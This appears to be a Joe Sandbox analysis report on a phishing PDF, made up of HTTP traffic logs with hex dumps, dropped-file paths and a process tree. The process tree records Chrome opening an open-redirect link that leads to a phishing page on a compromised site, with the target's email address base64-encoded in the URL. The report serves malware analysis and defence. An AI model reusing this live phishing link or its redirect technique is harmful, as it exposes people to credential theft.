2025-01-09 16:24:30 UTC	705	OUT	GET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:30 UTC	232	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:24:30 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 11 Oct 2024 18:47:11 GMT Accept-Ranges: bytes Content-Length: 1982 Content-Type: image/png
2025-01-09 16:24:30 UTC	1982	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 07 85 49 44 41 54 58 c3 bd 97 69 6c 54 d7 15 c7 7f f7 bd 37 bb 97 b1 cd 18 83 01 2f 21 b6 07 db 20 30 10 20 c2 d0 04 2a 1a 4c 03 82 d0 00 55 49 5a 4d b7 54 58 55 4a a8 1a a2 4a 4d bf 94 56 6d 9a 34 52 15 54 29 ad d4 40 1a b5 6c 86 80 ca 16 4c 09 01 52 8c 6b b0 8d 81 d8 40 bc db 33 f6 8c 67 9f 77 fb 61 c6 63 e3 98 66 a4 54 39 9f 9e ee 76 ce 3d e7 ff ff df f3 04 9f 63 4e 57 dd 53 c0 7b 80 75 c2 d4 db 08 e9 6a 7e 6b 5d 94 2f 60 4a 0a 6b 5a 80 de 09 63 12 f8 38 26 f9 42 ce 01 b4 14 d6 98 97 3a a7 18 cb 0b 32 93 03 3d 9e 20 67 ae f5 e8 97 5f 5f c3 97 11 80 9a 6e d1 d4 99 8e b1 0a c4 74 89 22 84 89 ff 83 a5 14 80 3d cd a8 ce 9c 62 45 08 81 44 e2 0f c5 50 15 Data Ascii: PNGIHDR szzIDATXilT7/! 0 *LUIZMTXUJJMVm4RT)@lLRk@3gwacfT9v=cNWS{uj~k]/`JkZc8&B:2= g__nt"=bEDP

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Appraisal-nation-Review_and_Signature_Request46074.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

QR Codes

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f0250e33-0755-4fef-b8ff-73f519513764.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Acrobat\Eureka\AcroCoreSync\Adobe\CoreSync\EntitySync\80307f885d209ff3421f3adf000d6b1e.db-shm

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Acrobat\Eureka\AcroCoreSync\Adobe\CoreSync\EntitySync\80307f885d209ff3421f3adf000d6b1e.db-wal

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Acrobat\Eureka\AcroCoreSync\CreativeCloud\CoreSync\EntitySync-2025-01-09.log

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250109162336Z-240.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Acrobat_Notification_Surface

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Windows Analysis Report
Appraisal-nation-Review_and_Signature_Request46074.pdf

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:31 UTC	454	OUT	GET /wp-content/uploads/2024/09/cropped-icone-32x32.png HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:31 UTC	232	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:24:31 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 11 Oct 2024 18:47:11 GMT Accept-Ranges: bytes Content-Length: 1982 Content-Type: image/png
2025-01-09 16:24:31 UTC	1982	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 07 85 49 44 41 54 58 c3 bd 97 69 6c 54 d7 15 c7 7f f7 bd 37 bb 97 b1 cd 18 83 01 2f 21 b6 07 db 20 30 10 20 c2 d0 04 2a 1a 4c 03 82 d0 00 55 49 5a 4d b7 54 58 55 4a a8 1a a2 4a 4d bf 94 56 6d 9a 34 52 15 54 29 ad d4 40 1a b5 6c 86 80 ca 16 4c 09 01 52 8c 6b b0 8d 81 d8 40 bc db 33 f6 8c 67 9f 77 fb 61 c6 63 e3 98 66 a4 54 39 9f 9e ee 76 ce 3d e7 ff ff df f3 04 9f 63 4e 57 dd 53 c0 7b 80 75 c2 d4 db 08 e9 6a 7e 6b 5d 94 2f 60 4a 0a 6b 5a 80 de 09 63 12 f8 38 26 f9 42 ce 01 b4 14 d6 98 97 3a a7 18 cb 0b 32 93 03 3d 9e 20 67 ae f5 e8 97 5f 5f c3 97 11 80 9a 6e d1 d4 99 8e b1 0a c4 74 89 22 84 89 ff 83 a5 14 80 3d cd a8 ce 9c 62 45 08 81 44 e2 0f c5 50 15 Data Ascii: PNGIHDR szzIDATXilT7/! 0 *LUIZMTXUJJMVm4RT)@lLRk@3gwacfT9v=cNWS{uj~k]/`JkZc8&B:2= g__nt"=bEDP

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:25:16 UTC	285	OUT	GET /weathermapdata/1/static/news/TopStories_72x72.png HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: assets.msn.com Connection: Keep-Alive
2025-01-09 16:25:16 UTC	1109	IN	HTTP/1.1 200 OK Content-Type: image/png Content-MD5: +e3nnz8xgZqYSd/C0OInSg== Last-Modified: Wed, 27 Mar 2024 03:51:39 GMT ETag: 0x8DC4E113533EB5D Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: d4b4c4eb-801e-0072-626d-e921ba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * Expires: Mon, 13 Jan 2025 09:54:04 GMT Date: Thu, 09 Jan 2025 16:25:16 GMT Content-Length: 4411 Connection: close Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.38.99.137,b=616457781,c=g,n=DE_HE_FRANKFURT,o=20940] Server-Timing: clientrtt; dur=86, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.38.99.137 Akamai-Request-ID: 24be6635 Cache-Control: public, max-age=2592000 Timing-Allow-Origin: * Akamai-GRN: 0.89632617.1736439916.24be6635 Vary: Origin
2025-01-09 16:25:16 UTC	4411	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 49 08 06 00 00 00 9e b1 60 e2 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 10 d0 49 44 41 54 78 01 ed 5c 6b 8c 5d 55 15 5e 6b 9f 3b 77 66 5a a0 2f 95 29 f6 19 c3 ab 50 18 9e 56 2a 76 2a 8a 20 51 a9 4a 8c 3f 0c 90 f8 57 e1 8f 41 7f 20 fd 25 7f 4c a8 4a 4c e4 0f 1d 35 f1 8f 91 3b 04 5b a2 e2 9c 41 20 04 1a 7a c1 0a 21 d0 ce 0c ef 96 47 ef b4 f4 31 33 f7 ec e5 da ef 7d ee 6b ee 3c 3a 33 18 57 7b 7b cf d9 fb 9c 73 f7 fe f6 5a df 5a 6b ef b3 8b b0 80 b2 e9 af c3 bd 24 f0 01 81 d8 47 48 65 44 2c 8b 02 96 8e 8f 65 43 23 3b 36 56 60 11 08 c2 02 c9 45 7b 87 37 24 28 f6 13 d1 72 10 48 88 Data Ascii: PNGIHDRHI`pHYssRGBgAMAaIDATx\k]U^k;wfZ/)PVv QJ?WA %LJL5;[A z!G13}k<:3W{{sZZk$GHeD,eC#;6V`E{7$(rH

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:25:20 UTC	705	OUT	POST /script/sliderFail.php HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive Content-Length: 13 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: application/json sec-ch-ua-mobile: ?0 Accept: / Origin: https://plasticoscorrea.com.br Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:25:20 UTC	13	OUT	Data Raw: 7b 22 66 61 69 6c 22 3a 74 72 75 65 7d Data Ascii: {"fail":true}
2025-01-09 16:25:20 UTC	310	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:25:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-01-09 16:25:20 UTC	78	IN	Data Raw: 34 33 0d 0a 7b 22 62 6c 6f 63 6b 65 64 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 72 6f 6e 74 2d 65 6e 64 20 66 61 69 6c 20 72 65 63 6f 72 64 65 64 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 31 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 43{"blocked":false,"message":"Front-end fail recorded","failCount":1}0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:25:21 UTC	425	OUT	GET /script/sliderFail.php HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:25:21 UTC	310	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:25:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-01-09 16:25:21 UTC	78	IN	Data Raw: 34 33 0d 0a 7b 22 62 6c 6f 63 6b 65 64 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 72 6f 6e 74 2d 65 6e 64 20 66 61 69 6c 20 72 65 63 6f 72 64 65 64 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 32 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 43{"blocked":false,"message":"Front-end fail recorded","failCount":2}0

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:25:23 UTC	714	OUT	GET /script/images/Pic1.jpg HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive Origin: https://plasticoscorrea.com.br sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:25:23 UTC	383	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 16:25:23 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 16:25:23 UTC	7809	IN	Data Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 50 6c c3 a1 73 74 69 63 6f 73 20 43 6f 72 72 65 61 3c 2f Data Ascii: 4000<!doctype html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Pgina no encontrada – Plsticos Correa</

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:25:24 UTC	714	OUT	GET /script/images/Pic2.jpg HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive Origin: https://plasticoscorrea.com.br sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:25:24 UTC	383	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 16:25:24 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 16:25:24 UTC	7809	IN	Data Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 50 6c c3 a1 73 74 69 63 6f 73 20 43 6f 72 72 65 61 3c 2f Data Ascii: 4000<!doctype html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Pgina no encontrada – Plsticos Correa</

Target ID:	0
Start time:	11:23:28
Start date:	09/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Appraisal-nation-Review_and_Signature_Request46074.pdf"
Imagebase:	0x7ff7a0c70000
File size:	5'887'384 bytes
MD5 hash:	4354BCD7483AABB81809350484FFD58F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	1
Start time:	11:23:29
Start date:	09/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6cb310000
File size:	3'661'208 bytes
MD5 hash:	B104218348848F1F113AF11C0982931A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	2
Start time:	11:23:30
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
Imagebase:	0x7ff62b420000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	3
Start time:	11:23:31
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1932,i,6939631540764321379,10229849018345657051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241209-180048.133000 --mojo-platform-channel-handle=2296 /prefetch:3
Imagebase:	0x7ff62b420000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false